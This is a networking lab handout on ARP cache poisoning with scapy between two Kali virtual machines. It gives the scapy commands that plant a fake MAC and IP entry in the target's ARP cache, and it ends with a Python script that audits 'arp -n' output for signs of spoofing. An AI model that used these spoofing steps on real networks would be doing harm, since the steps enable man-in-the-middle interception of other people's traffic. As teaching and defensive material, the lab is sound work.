ARP Spoofing with scapy (NETLAB)

Purpose

We will craft an ARP packet that adds a fake entry to the Target computer's ARP cache. This is ARP cache poisoning, the technique that man-in-the-middle attacks on a LAN are built on: a host that trusts an unsolicited or spoofed ARP message will send its traffic to whatever MAC address the attacker names. Understanding how ARP works is essential for network engineers and security professionals.

Finding the IP Address of the Attacker Machine

Open the Kali64 virtual machine. This is your Attacker machine. Log in as root with the password toor.

Use this command to find your Attacker IP address:

ifconfig
Your Attacker IP address should be 172.16.1.202.

Finding the IP Address of the Target Machine

Open the Kali32 virtual machine. This is your Target machine. Log in as root with the password toor.

Use this command to find your Target IP address:

ifconfig
Your Target IP address should be 172.16.1.203.

Sending PINGS to the Target Machine

On your Attacker machine, execute this command, which pings the Target:
ping -c 3 172.16.1.203

Viewing the ARP Cache on the Target Machine

In order to send the pings, the two machines exchanged ARP packets to learn each other's MAC addresses, and each cached the result.

On the Target machine, execute this command:

arp -n
The MAC address of the Attacker appears, as shown below.

Clearing the ARP Cache on the Target Machine

On the Target machine, execute these commands:

ip -s -s neigh flush all

arp -n

The Attacker's MAC address is gone, as shown below.

Creating an ARP Packet with Scapy

On the Attacker Machine, execute these commands:
scapy

a = ARP()

a.display()

The attributes of the ARP object named "a" are displayed, as shown below on this page.

If the colors are difficult to see, adjust them by clicking Edit, "Profile Preferences", Colors. I used "Black on light yellow".

Sending a Malicious ARP from scapy

We'll send a crafted ARP packet to the Target, tricking it into adding a false MAC address to its ARP cache. Note that we leave the ARP opcode at scapy's default of 1 (who-has), so what goes out is a spoofed ARP request addressed to the Target's IP, not a reply. Linux answers a request for its own address and, while doing so, records the sender hardware and protocol addresses claimed in the ARP fields. The Ethernet frame itself still carries the Attacker's real source MAC; the lie is in the ARP sender fields, and those are what the Target caches.

On the Attacker Machine, execute these commands.

In the first command, enter the IP address of your Target machine.

The MAC and IP addresses in the second and third command are intentionally fake--leave them as they are.

The last MAC address is a broadcast address--leave it as it is.

a.pdst="172.16.1.203"

a.hwsrc="11:11:11:11:11:11"

a.psrc="1.1.1.1"

a.hwdst="ff:ff:ff:ff:ff:ff"

send(a)

The commands are shown in the figure below on this page.

Viewing the ARP Cache on the Target Machine

On the Target machine, execute this command:

arp -n
The fake entry should be visible. On Linux, arp -n labels the columns "Address" and "HWaddress", so the entry shows an Address of 1.1.1.1 and an HWaddress of 11:11:11:11:11:11, as shown below on this page. (The "Internet Address" and "Physical Address" headings, and the dash-separated MAC, are what the Windows arp command prints.)
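The poisoned entry is easy to spot by eye here, but on a busy host the check should be automated. The following added example (not part of the original lab) parses net-tools arp -n output and flags three indicators: a neighbour whose address is outside the interface's subnet (the lab's 1.1.1.1 entry), a host whose MAC differs from a recorded baseline, and one MAC address claimed by several IPs. The sample table is constructed; it goes beyond the lab by adding a row in which the default gateway 172.16.1.1 resolves to the Attacker's MAC, which is what a full man-in-the-middle poison looks like in the cache. The baseline MAC 08:00:27:00:00:fe and the interface MACs are assumed placeholders.

```python
import ipaddress
import sys
from collections import defaultdict

# Constructed sample of `arp -n` on the Target after the lab's packet arrives, plus one
# constructed row (172.16.1.1 at the Attacker's MAC) showing a gateway impersonation.
SAMPLE_ARP_N = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
172.16.1.202             ether   08:00:27:aa:bb:cc   C                     eth0
172.16.1.1               ether   08:00:27:aa:bb:cc   C                     eth0
1.1.1.1                  ether   11:11:11:11:11:11   C                     eth0
172.16.1.50                      (incomplete)                              eth0
"""

# Assumed known-good mapping recorded before the lab (the idea behind arpwatch).
BASELINE = {"172.16.1.1": "08:00:27:00:00:fe"}


def parse_arp_table(text):
    """Parse net-tools `arp -n` output into {ip, mac, iface} dicts, skipping incomplete rows."""
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[1] != "ether":
            continue  # header line, blank line, or an "(incomplete)" entry
        entries.append({"ip": parts[0], "mac": parts[2].lower(), "iface": parts[-1]})
    return entries


def audit_arp_table(entries, subnet, baseline=None):
    """Return findings as tuples: off-subnet neighbours, baseline mismatches, shared MACs."""
    net = ipaddress.ip_network(subnet, strict=False)
    baseline = baseline or {}
    findings = []
    ips_per_mac = defaultdict(list)
    for e in entries:
        ips_per_mac[e["mac"]].append(e["ip"])
        # A neighbour outside the link's subnet has no business in the ARP cache at all.
        if ipaddress.ip_address(e["ip"]) not in net:
            findings.append(("off-subnet", e["ip"], e["mac"]))
        # A known host whose MAC changed is the classic ARP-spoofing indicator.
        if e["ip"] in baseline and baseline[e["ip"]] != e["mac"]:
            findings.append(("baseline-mismatch", e["ip"], e["mac"]))
    # One NIC answering for several IPs is how an attacker sits between victim and gateway.
    for mac, ips in ips_per_mac.items():
        if len(ips) > 1:
            findings.append(("shared-mac", mac, tuple(sorted(ips))))
    return findings


if __name__ == "__main__":
    # usage: arp -n | python3 arp_audit.py 172.16.1.0/24   (no args: audit the sample)
    if len(sys.argv) > 1:
        table, subnet = sys.stdin.read(), sys.argv[1]
    else:
        table, subnet = SAMPLE_ARP_N, "172.16.1.0/24"
    for finding in audit_arp_table(parse_arp_table(table), subnet, BASELINE):
        print(*finding)
```

Each check catches a different stage of the attack: the off-subnet rule fires on the lab's 1.1.1.1 entry immediately, the baseline rule needs a snapshot taken while the network was clean, and the shared-MAC rule fires once the attacker poisons both ends of a conversation.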


Source

http://www.shelltoad.com/coding/arp-spoofing-with-scapy


Last modified: 5-1-12
Modified for NETLAB 6-9-16